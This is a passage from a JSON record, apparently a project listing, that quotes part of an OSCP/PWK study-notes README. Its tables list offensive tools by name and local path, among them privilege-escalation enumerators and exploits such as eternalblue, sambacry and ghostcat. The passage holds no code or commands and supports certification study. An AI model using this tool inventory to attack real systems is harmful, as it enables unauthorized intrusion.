  |\r\n| `roguepotato`               | `~/Desktop/web/roguepotato.exe`             | Yes        |\r\n\r\n\r\n### Linux Enumeration\r\n\r\n| Toolname                  | Location                                  | Installed  |\r\n| ------------------------- | ----------------------------------------- | ---------- |\r\n| `sudo_killer`             | `~/Desktop/tools/SUDO_KILLER`             | Yes        |\r\n| `linux-exploit-suggester` | `~/Desktop/tools/linux-exploit-suggester` | Yes        |\r\n| `LinEnum.sh`              | `~/Desktop/web/linenum.sh`                | Yes        |\r\n| `linux-smart-enumeration` | `~/Desktop/web/lse.sh`                    | Yes        |\r\n| `linPEAS`                 | `~/Desktop/web/linpeas.sh`                | Yes        |\r\n\r\n\r\n### Exploits\r\n\r\n| Toolname                  | Location                                  | Installed  |\r\n| 
------------------------- | ----------------------------------------- | ---------- |\r\n| `eternalblue`             | `~/Desktop/exploits/eternablue`           | Yes        |\r\n| `sambacry`                | `~/Desktop/exploits/sambacry`             | Yes        |\r\n| `ghostcat`                | `~/Desktop/exploits/ghostcat`             | Yes        |\r\n| `postfix shellshock`      | `~/Desktop/exploits/postfix_shellshock`   | Yes        |\r\n| `xploit_installer`        | `~/Desktop/exploits/xploit_installer`     | Yes        |\r\n\r\n### Compiled Binaries\r\n\r\n| Toolname                  | Location                                  | Installed  |\r\n| ------------------------- | ----------------------------------------- | ---------- |\r\n| `windows-binaries`        | `~/Desktop/tools/windows-binaries`        | Yes        |\r\n| `static-binaries`         | `~/Desktop/exploits/static-binaries`      | Yes        |","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frizemon%2Foscp-pwk-notes","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frizemon%2Foscp-pwk-notes","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frizemon%2Foscp-pwk-notes/lists"}